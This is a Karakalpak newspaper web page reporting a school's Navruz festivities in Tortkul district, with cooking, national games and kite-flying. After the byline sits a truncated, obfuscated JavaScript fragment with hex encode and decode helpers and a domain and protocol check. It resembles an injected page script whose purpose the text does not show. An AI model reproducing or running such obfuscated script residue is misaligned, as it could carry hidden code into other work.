Еркин Қарақалпақстан Вести Каракалпакстана 04:12:34, 05.06.2020
Хош келипсиз! | RSS
Сайт мазмуны

Кириў усылы

ЯДТА ҚАЛАРЛЫҚТАЙ БАЙРАМ

Наўрыз тәбияттың ояныў паслы, мийрим-шәпәәт әййямы, арзыў-үмитлер елшиси. Халқымызды жақсы нийетлерге баслаўшы байрам. Бәҳәр үлкемизге жылдағыдан өзгеше руўхта қәдем таслады. Асықтай бултсыз ашық аспан, жанға жағымлы қуяшлы ҳаўа-райы, аппақ гүлге бүркенген ериклер байрам жақынласқанынан дәрек береди. Наў­рыз нураныйлар, ҳәттеки, кишкенелерге де ортақ байрам.

Райондағы 18-санлы қәнигелестирилген мәмлекетлик улыўма билим бериў мектебиниң муғаллимлери ҳәм оқыўшылары быйылғы байрамды көтериңки кейпиятта күтип алды. «Өзбекистан», «Истиқлол», «Тынышлық» мәкан пуқаралар жыйынлары аймағына жайласқан мектепте 724 оқыўшылар тәлим алмақта. Оларға 54 муғаллим билим берип келмекте.

Сүмелек сейили ҳешкимди бийпәрўа қалдырмады. 78 бәҳәрин қарсылап атыр­ған кейўаны ана Алтын Сапаевадан жаслар сүмелек қайнатыў сырларынан хабарлы болды. Аяқ ойын дөгереги басшысы Турсынай Бекманованың шәкиртлери миллий ойынлары менен сейил қатнасыўшыларына заўық бағышлады. Ата-аналар перзентлери талантларына тәсийин қалыс­ты.

— Наўрыз байрамы оқыўшыларымызға бизге мийрас дәстүрлеримиз, миллий ойынларымызды жақыннан таныўына берилген имканият. Бир нанды теңдей бөлип жеген халықпыз. Кеўил жақынларына бир кесе сүмелек берип сыйлайды. Гәп кеседеги несийбеде деп билип, өзгениң қәдирин түсинген халық бундай дәстүрди мийрас санап, перзентлерине нәсиятлайды. Бизиң мақсетимиз, дәстүримизди жалғастырыў, - дейди мектеп директоры Зухра Абдуллаева.

Қолы еплилери қустан айнымастай етип ҳәр қыйлы реңдеги соққан пәтпелеклерин ушырыўға қулпәреңи шығып таярланып атырса, қызлар бектас ойнаў менен машқул, арқан тартыў, тас көтериў, әткөншек ушыў сыяқлы миллий ойынлар ышқыпазлары шаршағанша ойнап, қумардан шықты. Таң азаннан басланған Наў­рыз байрамы күн батқанша қызықлы өтти.

Әл ҳаўаға ушқан ҳәр қыйлы реңдеги пәтпелеклер көтерилип, бәлентлеген са­йын балалардың жүреклери шәўкилдесип қоя берди.

Қ.РЕЙМОВ,

өз хабаршымыз,

Төрткүл районы.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "erkinkarakalpak.uz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

Излеў

Көп оқылған мақалалар

Сыбайлас сайтлар

Қарақалпақстан Республикасы Жоқарғы Кеңеси ҳәм Министрлер Кеңесиниң газеталары.
Қарақалпақстан баспасөз ҳәм хабар агентлигинде 2007-жыл 7-февральда дизимге алынған. Гүўалық № 01-001
Developed by TUIT NF